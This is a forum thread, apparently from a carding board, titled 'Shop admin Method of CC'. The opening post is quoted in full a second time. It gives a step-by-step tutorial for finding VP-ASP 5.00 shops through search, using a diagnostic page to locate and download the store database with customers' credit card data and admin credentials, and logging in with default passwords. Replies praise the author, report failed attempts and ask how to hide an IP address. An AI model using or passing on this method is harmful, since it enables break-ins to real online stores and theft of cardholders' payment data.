Shop admin Method of CC

skildowizard
sway

Shop admin Method of CC Empty
PostSubject: Shop admin Method of CC   Shop admin Method of CC Empty2011-04-09, 22:35

Shopadmins are of different
companies, like: VP-ASP , X CART,
etc. This tutorial is for hacking VP-
ASP SHOP.

1. Go to google.com and type: VP-
ASP Shopping Cart 5.00
2. You will find many websites with
VP-ASP 5.00 cart software installed
Now let's go to the exploit..
The page will be like this: ****://
***.victim.com/shop/
shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://
***.victim.com/shop/diag_
dbtest.asp
A page will appear contain those:
xDatabase
shopping140
xDblocation
resx
xdatabasetypexEmailxEmail
NamexEmailSubjectxEmailSy
stemxEmailTypexOrdernumbe r
Example:
The most important thing here is
xDatabase
xDatabase: shopping140
Ok, now the URL will be like this:
****://***.victim.com/shop/
shopping140.mdb
If you didn't download the
Database, try this while there is
dblocation:
xDblocation
resx
the url will be: ****://
***.victim.com/shop/resx/
shopping140.mdb
If u see the error message you have
to try this :
shopping500.mdb
Download the mdb file and you
should be able to open it with any
mdb file viewer, you should be able
to find one at download.com, or
use MS Office Access.
Inside you should be able to find
credit card information, and you
should even be able to find the
admin username and password for
the website.
The admin login page is usually
located here: ****://***.victim.com/
shop/shopadmin.asp
If you cannot find the admin
username and password in the
mdb file or you can but it is
incorrect, or you cannot find the
mdb file at all, then try to find the
admin login page and enter the
default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2011-04-10, 16:40

Thx bro once again...that is very nice of you...but i try the user and password but is not working for me..or is cuz of my location..or do i need some ip address...if yes than plz i need one..ok and any software that can hide my ip id..thank you...job well done..

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2011-04-10, 17:36

hackmaster chei i can c dat u re on fire as usual

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2011-04-11, 07:58

[You must be registered and logged in to see this link.] i be don dey niss ur skills oh i even ask of u but thank GOD say u still dey wif us

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2011-04-11, 17:11

stay wrote:
[You must be registered and logged in to see this link.] i be don dey niss ur skills oh i even ask of u but thank GOD say u still dey wif us
yes oh.hacklord is very rear to find atimes

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2011-04-11, 18:36

i de o stay n abdulahi

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2011-04-11, 18:40

sumailiano wrote:
Thx bro once again...that is very nice of you...but i try the user and password but is not working for me..or is cuz of my location..or do i need some ip address...if yes than plz i need one..ok and any software that can hide my ip id..thank you...job well done..
wen u try n u dont succeed den keep on tryin wud dft method til u make it

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2011-04-12, 11:00

Thank you bro that is kind of you...hope to hear from u again...

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2011-04-12, 15:37

u guys are 2 good.
sway

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2011-06-24, 00:48

BROS ABEG GIVE ME UR NO

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2011-06-24, 02:52

abi
skildowizard

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2011-06-24, 06:20

thanks for the info dude. Wish i couid be like u someday
N.master

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2011-06-24, 07:04

Me not understand oo, cus am j.j.c here. Ned some esplanation hacklord great hacker!
N.master

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2011-06-24, 07:07

Guy pls need ur facebok/2go user name.
steelnero

PostSubject: hacklord   Shop admin Method of CC Empty2011-07-08, 18:15

Hacklord wrote:
Shopadmins are of different
companies, like: VP-ASP , X CART,
etc. This tutorial is for hacking VP-
ASP SHOP.

1. Go to google.com and type: VP-
ASP Shopping Cart 5.00
2. You will find many websites with
VP-ASP 5.00 cart software installed
Now let's go to the exploit..
The page will be like this: ****://
***.victim.com/shop/
shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://
***.victim.com/shop/diag_
dbtest.asp
A page will appear contain those:
xDatabase
shopping140
xDblocation
resx
xdatabasetypexEmailxEmail
NamexEmailSubjectxEmailSy
stemxEmailTypexOrdernumbe r
Example:
The most important thing here is
xDatabase
xDatabase: shopping140
Ok, now the URL will be like this:
shopping140.mdb
If you didn't download the
Database, try this while there is
dblocation:
xDblocation
resx
the url will be: ****://
***.victim.com/shop/resx/
shopping140.mdb
If u see the error message you have
to try this :
shopping500.mdb
Download the mdb file and you
should be able to open it with any
mdb file viewer, you should be able
to find one at download.com, or
use MS Office Access.
Inside you should be able to find
credit card information, and you
should even be able to find the
admin username and password for
the website.
The admin login page is usually
located here: ****://***.victim.com/
shop/shopadmin.asp
If you cannot find the admin
username and password in the
mdb file or you can but it is
incorrect, or you cannot find the
mdb file at all, then try to find the
admin login page and enter the
default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp

..... please post the web address again.. it is blocked and we can not view.. thanks for your help.
Nhash1

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2012-04-28, 00:03

Hacklord i tried this and it doesnt seem to be working anymore and the admin does not work either. Is there a new or different way?
segunodus

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty2012-09-13, 20:09

Dude, I try to appreciate his effort to post in this forum. It's all over the internet and the easiest way to hack the cart. I have not tried it though but i Have a friend who always try this and succeed. Do i need to install vp asp cart 5.00 or 7.00 before i can perform this?

PostSubject: Re: Shop admin Method of CC   Shop admin Method of CC Empty

Shop admin Method of CC